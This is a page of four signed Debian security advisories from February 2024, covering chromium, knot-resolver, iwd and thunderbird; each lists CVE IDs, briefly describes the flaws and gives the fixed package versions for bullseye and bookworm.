    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5634-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 28, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1938 CVE-2024-1939Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), this problem has been fixed inversion 122.0.6261.94-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXfhAcACgkQZF0CR8Nudjfb1g/9H3MTUe56oMfSFIxki7qRpyzRcYvSVgJ79T3fX5t9+s9mEtyPa3z2rZFoI4+0VHnUOxEyRdsmd+hjrCr5gl2UW7NjkAczVLNjJ57TRtP0//81L5CjZXKPA/uJMTftRbdoKJG4+nC/G7dgwmxEq8bTjXZ4qvKTmEn6LlUuoxfwp1PS+r7d0MEHFSLQNh/wBUNGYshhGSWkMG18LV0+V/7tQeXvj2SgQCjJuhIm8hFcgwxAFZgCcLnNLfVFI/85GojBUpCPk7jo9A/n0GHoEQNdN/piddYbYrRWeiA+1xnEJb0DdXW7HFOIgb3NUXn4F7QpAVxxi4iZ5cSZCASzzvRl5bhj+JPl309GlhY/QLU1sXF5KES5Y21pi2uioKwZOFkuiTTuyYW9w6NAP8U0CdPgqWNsPQEbbWP5eRHWTQRIiurZ03tb+boyMUXfgdm6NxnU8Z/vmJhiSk9bYC4ZX8h25ukaGT1TTka+9Zo8Mpu7AClVDkKSzn/ybn+gbw7omtl3GLX+bdJEuTKAJTyxKhsb9emAtyBSlr14zT5eNg2RnSx35Xu+0axyX3WUKL57PBqT4k6L+5MMKutwW7CEPHpuSk1paEmw9fw0k3dlhbc26Jg5s5WHyKlUM12AuEI9FBybZM22QneUvVFN3EosxCOQGT+MvU7atVMh+Xzp2LW+20U==iYsy-----END PGP SIGNATURE-----

Debian Security Advisory 5634-1

Debian Linux Security Advisory 5633-1 - It was discovered that malformed DNSSEC records within a DNS zone could result in denial of service against Knot Resolver, a caching, DNSSEC- validating DNS resolver.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5633-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 27, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : knot-resolverCVE ID         : CVE-2023-46317 CVE-2023-50387 CVE-2023-50868It was discovered that malformed DNSSEC records within a DNS zone couldresult in denial of service against Knot Resolver, a caching, DNSSEC-validating DNS resolver.For the stable distribution (bookworm), these problems have been fixed inversion 5.6.0-1+deb12u1.We recommend that you upgrade your knot-resolver packages.For the detailed security status of knot-resolver please refer toits security tracker page at:https://security-tracker.debian.org/tracker/knot-resolverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXeVDMACgkQEMKTtsN8TjZ+PA//danYWvHrMi+Bo5EZHFBRrUHi6lCIE3jW/Nt+qEkZdJ17QV2rvGoiTtrxJQmt8PjlJxMG28Vyw6O8SIOzLgKivqR2FazvQ9XWFm+8VEAfB+mWjYjyQAgJ/T9CRPoo1lbrc6NFgZzBtz3gTN7H/Q0sdSWWTATvCAJfGXujToMA3oJjrNvidla8prE3zkMSGHvZyaP21iyn7cPmE9VOK628R13VOo6gKne+Wf9NDqJ7MnwE1lBFjqo7E/ahsoWDGPYNe2MxNi5S76XINU7NRDyibDCN+vmF6KPb66cBN5HkChlEFejd/5qsCjWqIMWMrfYNvcttvTkx73D7jVHKEkV/EaxoNVVXvzeSTGdsjvt/1ySQrK3uhWrpFQ4a72B5Oxtuk6NRCjFV9rJkoTfZ1SCpms+OVoG4nwVHxGfZGZefJ5O7u2q9r2r4HD4d5Bv+F+d+ey9ZCtHN2qL9AfBWapxdsGLAnb8r5Sp9HQQtMsm2o2XDD6dvJ/TF8g6kukROl796cUPU5j1mR+/voPBaMhZoLDpFtBCmmQ0it+bDrIBYUxxkgZHG/h/M25scGYwB4hzob1psHZvvuUAtT+l6+/WHTlKqTmOVgJ0/J3f+RKtihK5obqGS3VYXHsCetlWG79kejlzm6HlIISRANCZ6AtcpR1Ao3GBXYPnwL3xs4R7qvLU==QRSI-----END PGP SIGNATURE-----

Debian Security Advisory 5633-1

Debian Linux Security Advisory 5631-1 - It was discovered that iwd, the iNet Wireless Daemon, does not properly handle messages in the 4-way handshake used when connecting to a protected WiFi network for the first time. An attacker can take advantage of this flaw to gain unauthorized access to a protected WiFi network if iwd is operating in Access Point (AP) mode.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5631-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 25, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : iwdCVE ID         : CVE-2023-52161Debian Bug     : 1064062It was discovered that iwd, the iNet Wireless Daemon, does not properlyhandle messages in the 4-way handshake used when connecting to aprotected WiFi network for the first time. An attacker can takeadvantage of this flaw to gain unauthorized access to a protected WiFinetwork if iwd is operating in Access Point (AP) mode.For the oldstable distribution (bullseye), this problem has been fixedin version 1.14-3+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 2.3-1+deb12u1.We recommend that you upgrade your iwd packages.For the detailed security status of iwd please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/iwdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmXbGdBfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TLGg/9HYY8mbmW8ZU9Kf6v7Bns1D7hNx+6C76koK3nliJ1nTwya7rBBCkBo2TB1/x0h94k2s4AV5KSrJmP2RsqeGrnF/cTp8cKvdNYTU8QJYZA7q1B29MNQDhxqUYCO+HsSgm/HZdsNtajnqZi8KpP4wCbx9w5c1DZ2jmHt5z/vfZAn/Y5FOsPW0fZxe6UGNyoZ0/YwuY9bdH4dvhhsJOZg3B3FtD/DD7IsN0ltY2rFjJmmsQusCrmyDQsNYDYcH3iobOmHQPQ/QnjtrUQsyZb0M6/49EW38H1F76oc57o8jf4MTMsa68TeSFnBC5OOZ5MToB5yKiBAT0+J8wClBGI4iLYCkg6VERLT6pc7d+ffX+EshcTV9eAJgUUoeRGuCNld9M01gRN+i51Gib5YidfMhGQmRb9CMpiF3Ll5rErl/YmQ91GV5W5rBngEpkdQNedIYpPD/tqf2QxTcAzFyT+C+NgcB/LOI3O8p2rjYFEHl773DJEeHvfbwaTKgdKrlZUouO2lqadNQXugrLsGDNqhHOuVgxxzBONjZMyDKjfEOlcqjnySWeZ4CArxAriBVWJ5BbHf50ZLBpo7agcB//u0IH8z31OZwbkNXJfE58gVV0JRuqsfDbn0sIG6CB4r4I5CNICiubHZDJNwkGOVhdmSFcd5nelmPa45inO2DgxEBAKVdU==Pykz-----END PGP SIGNATURE-----

Debian Security Advisory 5631-1

Debian Linux Security Advisory 5630-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5630-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 23, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-1546 CVE-2024-1547 CVE-2024-1548 CVE-2024-1549   
                 CVE-2024-1550 CVE-2024-1551 CVE-2024-1552 CVE-2024-1553

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.8.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.8.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXY2ywACgkQEMKTtsN8  
TjaW9xAArkLgPB17t1jSCCm7U0jzbPKFTVdq0gHcPnwnTr2gtyoa7Ev5MpEa8ykm  
3x7xrmTtYHY2Pnz5kHYo/D0bBOfNE4bvOlYcPtzi9WG+N5BOJwsYdfA7IRY6kDtu  
HlNoywMpX43EoKYYSKxiwE37HyIjBlcvRh3bs9lr7nBvqyYKr2IHXbXgC89VxYm/  
ijszn2DH+kU0+P/0rKVO1GFyxJXHKTyP9Y2xsHHZURRiqKbGP+NWO+cuIqmqibq5  
HFkLAdlkOfog4QJW0OjMkKCHMtTF8lJYMOslfGYwBCGVRQPIWWALizvs8ORxpzub  
4B3wgNxsKcCHrfoyXW+AfvI4faFnZLKG0iqPu2YOaBIYQmHVNmEAzws96wBL2Jsc  
9qF6LLakZGDSXrx52J813Q2Sov420lhqoRG7Pe4j2aDUmxApYDAVbTqOcvQXpxer  
3CqugQc1uKtVqgF/oMLD1qi5C/fOtsTSdkmrLTPqn9KlI9i4u2Nu7Hg1+aCt4Q23  
eB7fF5ZuH554Fohvd1rCpjWBhe1mt6fOLtx+PYHirJLgkG4/M0yPg9yT74sCCvpP  
fmlTO14kBNU676S0pfproABZDY+iyfyCEEcZp0UBfcwrrsIqgXaUj9ghrvfY4Iff  
VVAhkPeDOrsSgDZob+3UO7qCP62vL0KmN8vPGU+g/e/8gr/48oA=  
=I9lx  
-----END PGP SIGNATURE-----

Tag

#debian